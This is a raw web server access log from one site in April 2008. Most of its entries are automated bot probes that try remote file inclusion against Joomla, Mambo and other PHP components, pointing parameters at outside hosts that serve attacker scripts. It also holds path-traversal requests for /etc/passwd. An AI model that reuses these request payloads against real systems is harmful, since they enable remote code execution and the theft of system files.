213.113.108.77 - - [10/Apr/2008:11:45:15 -0700] "GET /logs/access_080218.log//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.243.253.159 - - [10/Apr/2008:11:45:15 -0700] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.113.108.77 - - [10/Apr/2008:11:45:15 -0700] "GET //administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.113.108.77 - - [10/Apr/2008:11:45:16 -0700] "GET /logs//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.198.89.199 - - [10/Apr/2008:11:45:29 -0700] "GET /logs/access_080312.log//index.php?_REQUEST=&_REQUEST[option]=com_peoplebook&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://66.153.86.221/www??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.89.199 - - [10/Apr/2008:11:45:30 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=com_peoplebook&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://66.153.86.221/www??? HTTP/1.1" 200 50 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.89.199 - - [10/Apr/2008:11:45:30 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_peoplebook&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://66.153.86.221/www??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.233.41.58 - - [10/Apr/2008:11:45:39 -0700] "GET /logs/access_080308.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://formula.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.233.41.58 - - [10/Apr/2008:11:45:39 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://formula.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.233.41.58 - - [10/Apr/2008:11:45:39 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://formula.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.233.41.58 - - [10/Apr/2008:11:45:58 -0700] "GET /logs/access_080329.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://formula.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.92.69.70 - - [10/Apr/2008:11:46:04 -0700] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.96.85.9 - - [10/Apr/2008:11:46:32 -0700] "GET /logs/access_080213.log/index.php?configFile=../../../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.96.85.9 - - [10/Apr/2008:11:46:34 -0700] "GET /index.php?configFile=../../../../../../../../../../etc/passwd HTTP/1.1" 200 7371 "-" "libwww-perl/5.805" "www.dmulk.com"
82.96.85.9 - - [10/Apr/2008:11:46:35 -0700] "GET /logs/index.php?configFile=../../../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.100.6.58 - - [10/Apr/2008:11:46:50 -0700] "GET /modules/My_eGallery/index.php?basepath=http://theleybournes.com/img/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
61.100.6.58 - - [10/Apr/2008:11:46:50 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://theleybournes.com/img/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
216.167.156.20 - - [10/Apr/2008:11:47:12 -0700] "GET /logs/access_080308.log/modules/My_eGallery/index.php?basepath=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.167.156.20 - - [10/Apr/2008:11:47:13 -0700] "GET /modules/My_eGallery/index.php?basepath=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.167.156.20 - - [10/Apr/2008:11:47:13 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.96.85.9 - - [10/Apr/2008:11:47:17 -0700] "GET /logs/access_080321.log/index.php?configFile=../../../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.125.5.1 - - [10/Apr/2008:11:47:49 -0700] "GET /logs/access_080118.log//modules/xoopsgallery/index.php?GALLERY_BASEDIR=http://csinfo.pl/components/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.9.45 - - [10/Apr/2008:11:48:05 -0700] "GET /funny/?N=D HTTP/1.0" 200 792 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
216.40.45.130 - - [10/Apr/2008:11:48:11 -0700] "GET /logs/access_080131.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.joomla.teafree.pl/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.40.45.130 - - [10/Apr/2008:11:48:11 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.joomla.teafree.pl/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.40.45.130 - - [10/Apr/2008:11:48:11 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.joomla.teafree.pl/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.40.45.130 - - [10/Apr/2008:11:48:11 -0700] "GET /logs/access_071225.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.joomla.teafree.pl/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.94.72.29 - - [10/Apr/2008:11:48:38 -0700] "GET /logs/access_080329.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.silak.eu//components/com_rwcard/alba.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.94.72.29 - - [10/Apr/2008:11:48:39 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.silak.eu//components/com_rwcard/alba.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.94.72.29 - - [10/Apr/2008:11:48:39 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.silak.eu//components/com_rwcard/alba.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.92.87.138 - - [10/Apr/2008:11:48:41 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://www.gomaka.com/gomaka/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.195.37.167 - - [10/Apr/2008:11:48:43 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
159.28.18.4 - - [10/Apr/2008:11:48:47 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.gomaka.com/gomaka/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.195.37.167 - - [10/Apr/2008:11:48:51 -0700] "GET /logs/access_080308.log HTTP/1.0" 200 1557130 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
159.28.18.4 - - [10/Apr/2008:11:48:59 -0700] "GET /logs/access_080127.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.gomaka.com/gomaka/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.167.156.20 - - [10/Apr/2008:11:48:59 -0700] "GET /modules/My_eGallery/index.php?basepath=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
61.100.6.58 - - [10/Apr/2008:11:49:27 -0700] "GET /logs/access_080308.log/modules/My_eGallery/index.php?basepath=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.100.6.58 - - [10/Apr/2008:11:49:28 -0700] "GET /modules/My_eGallery/index.php?basepath=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.100.6.58 - - [10/Apr/2008:11:49:28 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.185.237.35 - - [10/Apr/2008:11:49:37 -0700] "GET /logs/access_080321.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.185.237.35 - - [10/Apr/2008:11:49:39 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 200 7371 "-" "libwww-perl/5.808" "www.dmulk.com"
64.185.237.35 - - [10/Apr/2008:11:49:40 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.40.45.130 - - [10/Apr/2008:11:49:47 -0700] "GET /logs/access_080126.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.joomla.teafree.pl/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.40.45.130 - - [10/Apr/2008:11:49:53 -0700] "GET /logs/access_080125.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.joomla.teafree.pl/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.185.237.35 - - [10/Apr/2008:11:50:23 -0700] "GET /logs/access.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.30.216.107 - - [10/Apr/2008:11:50:45 -0700] "GET /logs/access_080215.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
61.241.88.28 - - [10/Apr/2008:11:51:05 -0700] "GET /logs/access_080108.log/components/com_events/events_config.php?mosConfig_absolute_path=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.241.88.28 - - [10/Apr/2008:11:51:06 -0700] "GET /components/com_events/events_config.php?mosConfig_absolute_path=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.241.88.28 - - [10/Apr/2008:11:51:06 -0700] "GET /logs/components/com_events/events_config.php?mosConfig_absolute_path=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.165.93.49 - - [10/Apr/2008:11:51:29 -0700] "GET /logs/access_080131.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.165.93.49 - - [10/Apr/2008:11:51:30 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.165.93.49 - - [10/Apr/2008:11:51:30 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.135.126 - - [10/Apr/2008:11:51:50 -0700] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.125.5.1 - - [10/Apr/2008:11:52:01 -0700] "GET /logs/access_080118.log//modules/xoopsgallery/index.php?GALLERY_BASEDIR=http://csinfo.pl/components/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.89.199 - - [10/Apr/2008:11:52:06 -0700] "GET /logs/access_080218.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://66.153.86.221/www????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.89.199 - - [10/Apr/2008:11:52:06 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://66.153.86.221/www????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.89.199 - - [10/Apr/2008:11:52:07 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://66.153.86.221/www????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
59.125.5.1 - - [10/Apr/2008:11:52:34 -0700] "GET /logs/access_080118.log//modules/xoopsgallery/classes/gallery/UserDB.php?Gallery_UserDB=http://csinfo.pl/components/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.89.199 - - [10/Apr/2008:11:52:36 -0700] "GET /logs/access_080312.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://66.153.86.221/www????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.94.72.29 - - [10/Apr/2008:11:52:47 -0700] "GET /logs/access_080119.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.silak.eu//components/com_rwcard/alba.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.243.44.3 - - [10/Apr/2008:11:53:21 -0700] "GET /index.php?option=com_joomlaxplorer=add&Itemid=&mosConfig_absolute_path=http://refrigeratedwarehousingstorage.com/scaby/cmd.do? HTTP/1.1" 200 7371 "-" "libwww-perl/5.79" "www.dmulk.com"
216.40.45.130 - - [10/Apr/2008:11:53:40 -0700] "GET /logs/access_080321.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.joomla.teafree.pl/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.100.6.58 - - [10/Apr/2008:11:53:51 -0700] "GET /modules/My_eGallery/index.php?basepath=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.40.45.130 - - [10/Apr/2008:11:55:40 -0700] "GET /logs/access_080119.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.joomla.teafree.pl/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
159.28.18.4 - - [10/Apr/2008:11:55:48 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gomaka.com/gomaka/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.167.156.20 - - [10/Apr/2008:11:56:10 -0700] "GET /logs/access_080207.log/modules/My_eGallery/index.php?basepath=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.87.143.123 - - [10/Apr/2008:11:56:31 -0700] "GET /logs/access_080312.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://66.153.86.221/www????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.87.143.123 - - [10/Apr/2008:11:56:34 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://66.153.86.221/www????? HTTP/1.1" 200 7371 "-" "libwww-perl/5.805" "www.dmulk.com"
83.87.143.123 - - [10/Apr/2008:11:56:34 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://66.153.86.221/www????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.28.98 - - [10/Apr/2008:11:57:11 -0700] "GET /mobileoffice/?N=D HTTP/1.0" 200 5008 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
208.16.236.69 - - [10/Apr/2008:11:57:16 -0700] "GET /logs/access_080128.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.16.236.69 - - [10/Apr/2008:11:57:16 -0700] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.125.5.1 - - [10/Apr/2008:11:57:29 -0700] "GET /logs/access_080118.log//modules/xoopsgallery/classes/gallery/UserDB.php?Gallery_UserDB=http://csinfo.pl/components/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.230.212.199 - - [10/Apr/2008:11:57:55 -0700] "GET /logs/access_071225.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.chandonai.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.230.212.199 - - [10/Apr/2008:11:57:56 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.chandonai.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.230.212.199 - - [10/Apr/2008:11:57:56 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.chandonai.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.230.212.199 - - [10/Apr/2008:11:57:56 -0700] "GET /logs/access_071220.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.chandonai.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.27.146 - - [10/Apr/2008:11:57:57 -0700] "GET /components/com_flyspray/startdown.php?file=http://www.smdserv001.co.uk/cwfm/mambo??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
74.52.27.146 - - [10/Apr/2008:11:57:58 -0700] "GET /logs/components/com_flyspray/startdown.php?file=http://www.smdserv001.co.uk/cwfm/mambo??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
213.35.225.138 - - [10/Apr/2008:11:57:58 -0700] "GET /logs/access_080127.log/admin/admin.php?vwar_root=http://www.gomaka.com/gomaka/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.35.225.138 - - [10/Apr/2008:11:57:59 -0700] "GET /logs/admin/admin.php?vwar_root=http://www.gomaka.com/gomaka/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.40.45.130 - - [10/Apr/2008:11:58:14 -0700] "GET /logs/access_080127.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.joomla.teafree.pl/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.98.235.91 - - [10/Apr/2008:11:58:29 -0700] "GET /logs/access_080312.log//index.php?_REQUEST=&_REQUEST[option]=com_peoplebook&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://66.153.86.221/www????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.98.235.91 - - [10/Apr/2008:11:58:30 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=com_peoplebook&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://66.153.86.221/www????????????? HTTP/1.1" 200 50 "-" "libwww-perl/5.805" "www.dmulk.com"
82.98.235.91 - - [10/Apr/2008:11:58:30 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_peoplebook&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://66.153.86.221/www????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.125.5.1 - - [10/Apr/2008:11:58:30 -0700] "GET /logs/access_080118.log//modules/xoopsgallery/classes/gallery/UserDB.php?Gallery_UserDB=http://csinfo.pl/components/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
190.54.28.163 - - [10/Apr/2008:11:58:33 -0700] "GET //?pg=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 200 7371 "-" "libwww-perl/5.805" "www.dmulk.com"
89.248.99.153 - - [10/Apr/2008:11:58:36 -0700] "GET /components/com_simpleboard/file_upload.php?sbp=http://www.victoriakart.ru/usr/extensions/mambo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
89.248.99.153 - - [10/Apr/2008:11:58:36 -0700] "GET /logs/components/com_simpleboard/file_upload.php?sbp=http://www.victoriakart.ru/usr/extensions/mambo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
190.54.28.163 - - [10/Apr/2008:11:58:41 -0700] "GET //?pg=ftp://84.32.137.157/incoming/upload/trem/1? HTTP/1.1" 200 7371 "-" "libwww-perl/5.805" "www.dmulk.com"
193.23.172.8 - - [10/Apr/2008:11:58:48 -0700] "GET /logs/access_080207.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
213.198.89.199 - - [10/Apr/2008:11:58:54 -0700] "GET /logs/access_080321.log//index.php?_REQUEST=&_REQUEST[option]=com_peoplebook&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://66.153.86.221/www??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.64.35.54 - - [10/Apr/2008:12:00:06 -0700] "GET /logs/access_080308.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.chyna.sufx.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.64.35.54 - - [10/Apr/2008:12:00:06 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.chyna.sufx.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.64.35.54 - - [10/Apr/2008:12:00:07 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.chyna.sufx.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.70.35.179 - - [10/Apr/2008:12:00:13 -0700] "GET /presto/ HTTP/1.1" 200 526 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.6) Gecko/20061201 Firefox/2.0.0.6 (Ubuntu-feisty)" "www.dmulk.com"
216.40.45.130 - - [10/Apr/2008:12:00:34 -0700] "GET /logs/access_080106.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.joomla.teafree.pl/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.35.225.138 - - [10/Apr/2008:12:00:34 -0700] "GET /logs/access_080201.log/admin/admin.php?vwar_root=http://www.gomaka.com/gomaka/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.89.31.71 - - [10/Apr/2008:12:00:53 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://freewebs.com/albcrew/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.89.31.71 - - [10/Apr/2008:12:00:53 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://freewebs.com/albcrew/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
203.64.35.54 - - [10/Apr/2008:12:00:59 -0700] "GET /logs/access_080329.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.chyna.sufx.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.230.212.199 - - [10/Apr/2008:12:01:06 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.chandonai.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.230.212.199 - - [10/Apr/2008:12:01:07 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.chandonai.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.230.212.199 - - [10/Apr/2008:12:01:07 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.chandonai.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.87.143.123 - - [10/Apr/2008:12:01:07 -0700] "GET /logs/access_080321.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://66.153.86.221/www????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.100.6.58 - - [10/Apr/2008:12:01:11 -0700] "GET /logs/access_080207.log/modules/My_eGallery/index.php?basepath=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.230.212.199 - - [10/Apr/2008:12:01:36 -0700] "GET /logs/access_080123.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.chandonai.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.230.212.199 - - [10/Apr/2008:12:01:40 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.chandonai.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.230.212.199 - - [10/Apr/2008:12:01:40 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.chandonai.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.230.212.199 - - [10/Apr/2008:12:02:13 -0700] "GET /logs/access_080123.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.chandonai.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.16.236.69 - - [10/Apr/2008:12:02:22 -0700] "GET /index.php?fn=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 200 7371 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.23.57 - - [10/Apr/2008:12:02:27 -0700] "GET /?M=D HTTP/1.0" 200 7355 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
